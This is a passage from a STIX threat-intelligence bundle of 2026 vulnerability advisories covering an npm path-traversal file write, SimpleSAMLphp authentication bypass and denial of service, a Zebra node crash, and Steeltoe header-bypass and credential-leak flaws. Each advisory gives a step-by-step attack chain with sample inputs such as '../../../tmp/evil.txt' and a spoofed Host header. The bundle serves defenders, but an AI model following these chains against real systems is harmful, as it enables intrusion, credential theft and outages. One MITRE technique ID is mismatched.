          "source_name": "reference",
          "url": "https://github.com/jsonata-js/jsonata/releases/tag/v2.2.0"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c6840542-3dd7-5e21-9ff3-e597bf9a004a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8ea3850d-7c52-5872-83b4-723f518bfecd",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--349177a6-79ef-5217-94b6-bda4ead47779",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8ea3850d-7c52-5872-83b4-723f518bfecd",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c019e50-984d-5a4f-a647-7a01108a23ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8ea3850d-7c52-5872-83b4-723f518bfecd",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7d05293d-3f33-5d24-9485-bbb6ffbab51b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8ea3850d-7c52-5872-83b4-723f518bfecd",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8ea3850d-7c52-5872-83b4-723f518bfecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Path Traversal Vulnerability in @asymmetric-effort/nogginlessdom Allows Arbitrary File Write",
      "description": "## Overview\n\nA critical path traversal vulnerability, tracked as GHSA-322x-v876-g883, has been identified in the `matchFileSnapshot` function within the `@asymmetric-effort/nogginlessdom` JavaScript library, specifically in versions `0.0.21` and earlier. This flaw arises from insufficient validation of the `filePath` parameter when the library operates in snapshot update mode (e.g., `UPDATE_SNAPSHOTS=1` environment variable or `setUpdateMode('all')`). An attacker capable of controlling the `filePath` input during testing can exploit this to write arbitrary content to any location on the filesystem where the process has write permissions. This includes creating new directories and overwriting existing files, posing a significant risk, particularly in CI/CD pipelines where untrusted test inputs from pull requests could lead to supply chain compromise.\n\n## Attack Chain\n\n1.  An attacker crafts malicious test input that includes a specially constructed `filePath` parameter containing path traversal sequences (e.g., `../../../tmp/evil.txt`).\n2.  The malicious test input is processed in an environment where the `@asymmetric-effort/nogginlessdom` library is used, and the snapshot update mode is active (`UPDATE_SNAPSHOTS=1` or `setUpdateMode('all')`).\n3.  The vulnerable `matchFileSnapshot` function is called with the attacker-controlled `filePath` and arbitrary content.\n4.  The `fs.existsSync(filePath)` check fails because the path is outside the expected directory, triggering the creation logic.\n5.  The library’s `fs.mkdirSync(dir, { recursive: true });` function creates intermediate directories specified by the attacker in the malicious `filePath`.\n6.  The `fs.writeFileSync(filePath, serialized, 'utf-8');` function writes attacker-controlled `serialized` content to the arbitrary `filePath`.\n7.  In a CI/CD environment, this allows overwriting critical configuration files (e.g., `/home/runner/.github/workflows/backdoor.yml`), injecting malicious code into build artifacts, or modifying pipeline definitions.\n8.  The successful write leads to arbitrary code execution, persistence within the build system, or compromise of distributed software.\n\n## Impact\n\nThe vulnerability allows an attacker to perform arbitrary file writes, creating new directories and overwriting existing files with attacker-controlled content. In CI/CD environments, this is particularly severe as untrusted pull requests could trigger the exploit. Consequences include the complete compromise of build processes, such as overwriting CI configuration files to inject malicious steps, injecting malicious code directly into build artifacts, or modifying source code used in subsequent builds. This directly enables supply chain attacks, potentially affecting all downstream consumers of the compromised software. The specific number of victims is not available, but any organization using vulnerable versions of the library in their CI/CD systems is at risk.\n\n## Recommendation\n\n*   Upgrade `@asymmetric-effort/nogginlessdom` to version `0.0.22` or later immediately to apply the patch referenced in GHSA-322x-v876-g883.\n*   Implement controls to prevent untrusted input from reaching build environments, especially in CI/CD pipelines.\n*   Review CI/CD pipeline definitions and build artifacts for unauthorized modifications after applying the patch.\n",
      "published": "2026-07-03T11:29:03Z",
      "labels": [
        "path-traversal",
        "supply-chain",
        "ci/cd",
        "npm",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-322x-v876-g883"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f3314cf-c09d-5929-9207-fc1e472dc7bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ab848983-84aa-52a8-93ac-4e43da16599f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ab848983-84aa-52a8-93ac-4e43da16599f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SimpleSAMLphp HTTP-Artifact Authentication Bypass via TLS Validator Confusion (CVE-2026-49283)",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-49283) in SimpleSAMLphp's HTTP-Artifact receive path allows a malicious or lower-trust Identity Provider (IdP) to bypass authentication and impersonate users from a higher-trust IdP. This flaw, present in versions \u003c 4.20.2, \u003e= 5.0.0 \u003c 5.0.6, and \u003e= 6.0.0 \u003c 6.2.1 of the `saml2` and `saml2-legacy` packages, occurs because the `SOAPClient::validateSSL()` method fails to throw an exception when the TLS public key does not match, causing `SAML2\\Message::validate()` to incorrectly deem an unsigned embedded SAML `Response` as cryptographically valid. This enables the attacker to forge assertion attributes, NameID, and session data, effectively authenticating as arbitrary users from a high-assurance IdP within a multi-IdP or federation deployment. For defenders, this means a compromised or untrusted IdP within their trust circle could gain unauthorized access to Service Providers, violating trust boundaries and leading to significant data breaches or unauthorized system access.\n\n## Attack Chain\n\n1.  A malicious or lower-trust Identity Provider (IdP) crafts an unsigned SAML `Response` that claims to be issued by a high-trust IdP.\n2.  The malicious IdP sends an HTTP-Artifact `Response` containing this forged `SAML Response` to the Service Provider (SP).\n3.  The SP's SimpleSAMLphp installation receives the HTTP-Artifact `Response` and initiates its `HTTPArtifact::receive()` processing flow.\n4.  During processing of the `ArtifactResponse`, the `SOAPClient::addSSLValidator()` mechanism is invoked, providing a TLS-based validator for the outer SOAP message.\n5.  The embedded unsigned SAML `Response` is then passed to `SAML2\\Message::validate()`, which delegates signature validation to the validator provided by the outer `ArtifactResponse`.\n6.  The `SOAPClient::validateSSL()` method, when called to validate the embedded SAML `Response`, returns normally even though the TLS public key does not match the key for the claimed high-trust IdP.\n7.  Because `SOAPClient::validateSSL()` did not throw an exception, `SAML2\\Message::validate()` incorrectly interprets this as successful validation, treating the unsigned embedded SAML `Response` as cryptographically valid.\n8.  The SP then processes this maliciously validated SAML `Response` using metadata from the claimed high-trust IdP, granting the attacker authentication as arbitrary users from that IdP.\n\n## Impact\n\nThis vulnerability allows a malicious or lower-trust IdP within the same SP/federation trust set to authenticate to the Service Provider (SP) as arbitrary users from any higher-trust IdP when the HTTP-Artifact binding is in use. Attackers can choose and forge assertion attributes, `NameID`, and session data within the unsigned assertion, gaining unauthorized access as legitimate users. This represents a severe authentication bypass and identity-provider impersonation issue, fundamentally undermining the security boundaries in federated environments where the integrity of different IdPs is critical. If exploited, it could lead to widespread unauthorized access, data exfiltration, or further compromise of systems relying on the affected SimpleSAMLphp instances.\n\n## Recommendation\n\n*   Patch CVE-2026-49283 by updating SimpleSAMLphp to a non-vulnerable version immediately:\n    *   `composer/simplesamlphp/saml2`: Upgrade to `6.2.1` or later.\n    *   `composer/simplesamlphp/saml2`: Upgrade to `5.0.6` or later for version 5.x branch.\n    *   `composer/simplesamlphp/saml2` or `composer/simplesamlphp/saml2-legacy`: Upgrade to `4.20.2` or later for version 4.x branch.\n*   Review authentication logs for unusual login patterns or failed authentications originating from specific IdPs, especially if using HTTP-Artifact binding.\n",
      "published": "2026-07-03T11:27:06Z",
      "labels": [
        "vulnerability",
        "saml",
        "authentication-bypass",
        "identity-federation"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-6929-8p9f-26jx"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-49283"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2a86567f-2dd3-5643-8745-3ce4e8b0e244",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--20beab0f-adc2-5003-986d-0f73cf6365f8",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--20beab0f-adc2-5003-986d-0f73cf6365f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Zebra Node Denial-of-Service via IPv4-Mapped Mempool Misbehavior Panic (CVE-2026-52829)",
      "description": "## Overview\n\nA high-severity vulnerability, CVE-2026-52829, affects Zebra `zebrad` nodes up to version `4.4.1` and `zebra-network` up to `6.0.0`, potentially allowing a remote denial-of-service. An address normalization mismatch occurs when a peer connects via IPv4 to a dual-stack IPv6 listener (the default `[::]` address on Linux with `net.ipv6.bindv6only=0`), and subsequently triggers a mempool misbehavior penalty by advertising an invalid transaction. The `zebrad` software stores the peer's address in a canonical IPv4 form during the initial handshake, but later attempts to update its misbehavior status using the raw IPv4-mapped IPv6 address from the transient socket. This inconsistency leads to a deterministic assertion panic after a 30-second delay, terminating the `zebrad` process. This issue is critical for any `zebrad` node synchronized near the chain tip in a production environment as it enables persistent downtime.\n\n## Attack Chain\n\n1.  An unauthenticated attacker initiates an IPv4 connection to a vulnerable `zebrad` node listening on a dual-stack IPv6 address (e.g., `[::]` on Linux with `net.ipv6.bindv6only=0`).\n2.  During the P2P handshake, the `zebrad` node's address book canonicalizes the IPv4-mapped IPv6 address (e.g., `::ffff:127.0.0.1`) to a plain IPv4 address (e.g., `127.0.0.1`) and stores it.\n3.  The attacker advertises an invalid mempool transaction, such as a coinbase transaction, which the `zebrad` node attempts to download.\n4.  The `zebrad` node identifies the transaction as invalid and queues a misbehavior penalty for the peer, forwarding the raw IPv4-mapped IPv6 transient socket address.\n5.  After a 30-second batch flush, the address book attempts to apply the misbehavior update to the stored peer entry.\n6.  An internal assertion (`previous.addr == self.addr()`) fails because the canonical IPv4 address originally stored does not match the raw IPv4-mapped IPv6 address received for the misbehavior update.\n7.  This mismatch triggers a `panic = \"abort\"`, causing the `zebrad` process to terminate, resulting in a denial-of-service.\n8.  The attacker can repeat this sequence after each node restart, leading to persistent downtime.\n\n## Impact\n\nThis vulnerability allows any remote, unauthenticated peer to deterministically crash a synced Zebra node running in its default Linux dual-stack configuration. The attack requires no mining capability, RPC access, funds, or special privileges, making it highly accessible to adversaries. The `zebrad` process terminates abruptly, leading to service disruption. Since the attack can be repeated reliably after each restart, it poses a significant threat of persistent denial of service, impacting the availability and stability of the Zebra network. Nodes operating as part of critical infrastructure, such as those maintaining blockchain consensus, would face severe operational issues.\n\n## Recommendation\n\n*   Patch CVE-2026-52829 by upgrading `zebrad` to version `4.5.0` or higher immediately.\n*   As a temporary workaround, configure `zebrad`'s `listen_addr` to bind only to an IPv4-only address (e.g., `0.0.0.0:8233`) to prevent the use of IPv4-mapped IPv6 representations.\n*   Alternatively, on Linux hosts, set the kernel parameter `net.ipv6.bindv6only=1` to disable dual-stack acceptance on IPv6 listeners, thus preventing the vulnerable condition described in CVE-2026-52829.\n",
      "published": "2026-07-03T11:25:58Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "linux",
        "rust"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-63wg-wjjj-7cp8"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f96a888a-bbb0-501e-9e86-63b244046a82",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5b613a07-43b3-5fac-8cb5-d75a3ffdce18",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5b613a07-43b3-5fac-8cb5-d75a3ffdce18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SimpleSAMLphp Vulnerable to Denial-of-Service via Malicious XPath Transform",
      "description": "## Overview\n\nSimpleSAMLphp, a widely used open-source PHP application for SAML 2.0 service providers and identity providers, along with its underlying SAML2 library (composer/simplesamlphp/saml2 and composer/simplesamlphp/saml2-legacy), was found to be vulnerable to a Denial-of-Service (DoS) attack, tracked as CVE-2026-49289. The vulnerability, identified on or before July 2, 2026, arises from its handling of XPath transforms within SAML messages. Attackers can craft malicious SAML messages that, when processed by a vulnerable SimpleSAMLphp instance, cause resource exhaustion and lead to service interruption. This impacts any entity relying on these components and necessitates immediate updates to mitigate the risk of service disruption. A mitigation has been implemented in later versions (beyond 4.20.2) to restrict the number of transforms and disallow XPath transforms explicitly.\n\n## Attack Chain\n\n1.  An attacker identifies a target entity relying on SimpleSAMLphp for SAML processing.\n2.  The attacker crafts a specially designed SAML message incorporating complex or excessive XPath transforms.\n3.  The malicious SAML message is sent to the vulnerable SimpleSAMLphp instance, typically via an unauthenticated or authenticated SAML request/response endpoint.\n4.  The SimpleSAMLphp application receives and begins parsing the incoming SAML message, including its XPath transforms.\n5.  During the processing of the XPath transforms, the application consumes excessive system resources (CPU, memory).\n6.  Due to resource exhaustion, the SimpleSAMLphp instance becomes unresponsive or crashes, leading to a Denial-of-Service for legitimate users.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-49289 allows an attacker to render any entity relying on SimpleSAMLphp or the SAML2 library (versions \u003c= 4.20.2) unavailable. This directly impacts the ability of legitimate users to authenticate or access services protected by SimpleSAMLphp, leading to significant operational disruption, reputational damage, and potential financial losses for affected organizations. The vulnerability affects critical authentication infrastructure, making it a high-priority concern for any organization utilizing SimpleSAMLphp.\n\n## Recommendation\n\n*   Patch CVE-2026-49289 by upgrading `composer/simplesamlphp/saml2` and `composer/simplesamlphp/saml2-legacy` to versions greater than 4.20.2 immediately.\n*   Review the mitigation details provided in the GHSA-5cjr-mxj5-wmrx advisory for specific implementation guidance.\n",
      "published": "2026-07-03T11:25:05Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "saml",
        "php"
      ],
      "object_refs": [
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-5cjr-mxj5-wmrx"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f373f4f-54b6-523a-992f-45f8315bf11a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6732e7af-6984-5f40-86f3-668f6c7260c8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6732e7af-6984-5f40-86f3-668f6c7260c8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steeltoe Host Header Bypass Vulnerability (CVE-2026-50194)",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-50194) in Steeltoe applications allows unauthenticated remote attackers to bypass port isolation for management endpoints. This flaw affects configurations where `Management:Endpoints:Port` is explicitly set to a port different from the application's primary listener. The middleware, intended to restrict access, incorrectly relies on the `Host` HTTP header rather than the actual network socket port. By crafting a request with a spoofed `Host` header specifying the management port, attackers can trick the application into granting access to all actuator endpoints. This enables unauthorized control, information disclosure, and potential configuration manipulation, making it a high-severity concern for organizations using vulnerable Steeltoe versions, specifically `Steeltoe.Management.Endpoint` up to 4.1.0 and `Steeltoe.Management.EndpointCore` versions between 3.2.2 and 3.3.0.\n\n## Attack Chain\n\n1.  Attacker identifies a publicly accessible Steeltoe application that is likely using management endpoints.\n2.  The target Steeltoe application is configured with `Management:Endpoints:Port` set to a port different from its main listener (e.g., application on 80/443, management on 8080).\n3.  Attacker crafts an HTTP request targeting the application's main listener port, typically 80 or 443.\n4.  The crafted request includes a spoofed `Host` HTTP header, setting its value to the application's domain combined with the configured `Management:Endpoints:Port` (e.g., `Host: example.com:8080`).\n5.  The request scheme (HTTP/HTTPS) matches the `Management:Endpoints:SslEnabled` setting of the application.\n6.  The Steeltoe middleware, upon receiving the request, evaluates the `Host` header for port isolation rather than the actual socket port the request arrived on.\n7.  The spoofed `Host` header causes the middleware to erroneously permit access as if the request originated on the designated management port.\n8.  Attacker gains unauthenticated access to all management actuator endpoints (e.g., `/actuator/health`, `/actuator/env`), enabling information disclosure or potential configuration changes.\n\n## Impact\n\nThe successful exploitation of CVE-2026-50194 grants unauthenticated remote attackers full access to Steeltoe's management actuator endpoints. This can lead to severe consequences, including sensitive information disclosure (e.g., environment variables, application configuration), arbitrary configuration modifications, and potentially remote code execution if certain actuators are exposed and misconfigured. While no specific victim count has been reported, any organization deploying Steeltoe applications with the described vulnerable configuration is at risk. The ease of exploitation via a simple HTTP header manipulation makes this a high-risk vulnerability for data exposure and unauthorized system control.\n\n## Recommendation\n\n*   Immediately upgrade `Steeltoe.Management.Endpoint` to version 4.1.1 or higher, and `Steeltoe.Management.EndpointCore` to version 3.3.1 or higher, to address CVE-2026-50194.\n*   Deploy the provided Sigma rule to your SIEM, tuning `cs-host` to match your expected application domain and monitoring for `cs-uri-stem` containing `/actuator/` with unexpected port values in the `Host` header.\n*   Implement explicit ASP.NET Core authorization (`RequireAuthorization`) on all sensitive actuator endpoints as a defense-in-depth measure, as recommended by the Steeltoe advisory.\n*   Configure reverse proxies or load balancers in front of Steeltoe applications to strictly enforce expected `Host` header values, preventing clients from specifying arbitrary ports.\n",
      "published": "2026-07-03T11:24:19Z",
      "labels": [
        "vulnerability",
        "web-exploitation",
        "cve",
        "dotnet",
        "bypass"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-58f6-6rj2-3v8r"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--31cd00d9-b5a1-5858-aa87-552d94686a32",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steeltoe.Discovery.Eureka Deserialization Denial-of-Service (CVE-2026-50196)",
      "description": "## Overview\n\nThe Steeltoe.Discovery.Eureka client contains a critical vulnerability, identified as CVE-2026-50196, that can lead to a complete service discovery outage. The flaw resides in the `DataCenterInfo.FromJson` method, which is responsible for deserializing service registry information. This method incorrectly throws an `ArgumentException` when it encounters any `DataCenterInfo.name` value other than \"MyOwn\" or \"Amazon\". Crucially, the valid \"Netflix\" value, specified in the Java Eureka standard, is unrecognized. This exception propagates through the entire registry deserialization chain and is silently swallowed by the client's periodic cache refresh task. Consequently, the Steeltoe client's local service registry remains permanently empty or stale, severing its ability to perform service lookups. This issue affects versions `\u003e= 4.0.0, \u003c= 4.1.0` and versions `\u003c= 3.3.0` of the `nuget/Steeltoe.Discovery.Eureka` package. It matters for defenders because a single, legitimate registration by a Java or Spring service in a mixed environment can inadvertently trigger a widespread denial of service for all Steeltoe clients.\n\n## Attack Chain\n\n1. A legitimate non-Steeltoe Eureka client (e.g., a Java or Spring Boot application) registers itself with a Eureka server.\n2. The registering client sends its `DataCenterInfo.name` as \"Netflix\", which is a valid value according to the Java Eureka specification.\n3. A Steeltoe Eureka client (using the vulnerable `Steeltoe.Discovery.Eureka` package) attempts to fetch the full service registry from the Eureka server via an HTTP GET request.\n4. During the internal deserialization process of the fetched registry data, the Steeltoe client's `DataCenterInfo.FromJson` method encounters the \"Netflix\" value for `DataCenterInfo.name`.\n5. The `DataCenterInfo.FromJson` method, which only recognizes \"MyOwn\" or \"Amazon\" as valid names, incorrectly throws an `ArgumentException`.\n6. This `ArgumentException` propagates through the registry fetch process and is subsequently swallowed by the Steeltoe client's periodic cache refresh task.\n7. The Steeltoe client's local service registry cache fails to populate or update, leading to a persistent empty or stale state.\n8. Impact: All services relying on this Steeltoe client for service discovery experience a complete outage due to the inability to resolve service lookups, which persists until the triggering registration is removed.\n\n## Impact\n\nThe vulnerability results in a complete and persistent service discovery outage for all Steeltoe Eureka clients connected to the affected registry. New clients will start with an empty service registry, while running clients will cease to refresh their local cache, effectively rendering them unable to locate or communicate with other services. This outage is triggered by the presence of a single registration with an unrecognized `DataCenterInfo.name` (such as \"Netflix\", which is valid in Java Eureka). It can be inadvertently caused by legitimate Java or Spring services in a mixed environment, leading to widespread unavailability across microservice architectures until the problematic registration is manually removed from the Eureka server.\n\n## Recommendation\n\n*   Prioritize upgrading all instances of `Steeltoe.Discovery.Eureka` to a patched version that addresses CVE-2026-50196.\n*   If immediate upgrade is not possible, audit your Eureka registry for any registrations using `DataCenterInfo.name` values other than \"MyOwn\" or \"Amazon\", specifically \"Netflix\", and remove them.\n*   In environments with mixed Java/Spring and Steeltoe Eureka clients, proactively audit for the presence of the `Netflix` data center type before deploying Steeltoe Eureka clients to prevent CVE-2026-50196 from being triggered.\n",
      "published": "2026-07-03T11:23:15Z",
      "labels": [
        "vulnerability",
        "service-discovery",
        ".net",
        "java",
        "denial-of-service"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-j8ph-6fxj-g533"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--422b498a-6517-5e63-80ec-eb927a798f21",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b807f012-a13e-52a8-a990-3d20805f83b7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b807f012-a13e-52a8-a990-3d20805f83b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steeltoe Environment Actuator Vulnerability (CVE-2026-50200) Leaks Database Passwords",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-50200, affects the `Sanitizer` component within the Environment actuator of Steeltoe applications, specifically `Steeltoe.Management.Endpoint` versions `\u003c= 4.1.0` and `Steeltoe.Management.EndpointCore` versions `\u003c= 3.3.0`. This flaw allows sensitive connection string details, including embedded plaintext passwords and user credentials, to be exposed verbatim when the `/actuator/env` endpoint is accessed. The default sanitization rules fail to cover standard .NET `ConnectionStrings:\u003cname\u003e` or Steeltoe Connectors' `Steeltoe:Client:\u003ctype\u003e:Default:ConnectionString` patterns. This means that if `env` is exposed in `Management:Endpoints:Actuator:Exposure:Include` on standard deployments, or if accessed by an authenticated Cloud Foundry user with `read_basic_data` permissions via `/cloudfoundryapplication/env`, an attacker can retrieve critical database credentials, leading to direct access to backend databases and circumventing application-level security controls.\n\n## Attack Chain\n\n1.  Attacker conducts reconnaissance to identify a publicly accessible or internally exposed Steeltoe application endpoint, specifically targeting `/actuator/env` or `/cloudfoundryapplication/env`.\n2.  The attacker sends an unauthenticated (if publicly exposed) or authenticated (if Cloud Foundry with `read_basic_data` permissions) HTTP GET request to the identified `/actuator/env` or `/cloudfoundryapplication/env` endpoint.\n3.  The Steeltoe application's Environment actuator processes the request to display environment properties.\n4.  Due to the flaw in the `Sanitizer` component (CVE-2026-50200), configuration keys such as `ConnectionStrings:\u003cname\u003e` or `*:ConnectionString` are not properly redacted.\n5.  The application returns the full, unsanitized connection string values, which include plaintext credentials like `Password=` or `user:pass@host`, in the HTTP response body.\n6.  The attacker extracts these sensitive database credentials from the response.\n7.  Using the obtained credentials, the attacker establishes a direct connection to the backend database.\n8.  The attacker can then perform data exfiltration, manipulation, or further persistence actions on the database, bypassing the application layer.\n\n## Impact\n\nOrganizations running vulnerable Steeltoe applications are at high risk of credential compromise and direct database access. If successfully exploited, this vulnerability allows attackers to retrieve plaintext database credentials from the `/actuator/env` endpoint. This direct access to databases, such as SQL Server, PostgreSQL, or MySQL, can lead to severe consequences including unauthorized data exfiltration, data tampering, service disruption, and potential lateral movement within the network. The scope of impact is broad, affecting any organization utilizing Steeltoe where the actuator environment endpoint is exposed, either intentionally or inadvertently, without proper sanitization or authorization.\n\n## Recommendation\n\n*   Immediately upgrade `nuget/Steeltoe.Management.Endpoint` to version `4.1.1` or later, and `nuget/Steeltoe.Management.EndpointCore` to version `3.3.1` or later, to patch CVE-2026-50200.\n*   If immediate upgrade is not possible, remove `env` from `Management:Endpoints:Actuator:Exposure:Include` in your application configuration to prevent access via the standard path.\n*   As a defense-in-depth measure, add `.*connectionstring.*` to the `KeysToSanitize` list in your Steeltoe configuration to ensure these patterns are redacted.\n*   Enforce strong authorization on all actuator endpoints to limit access to trusted personnel and systems, as described in the brief's attack chain.\n*   Deploy the `Detects CVE-2026-50200 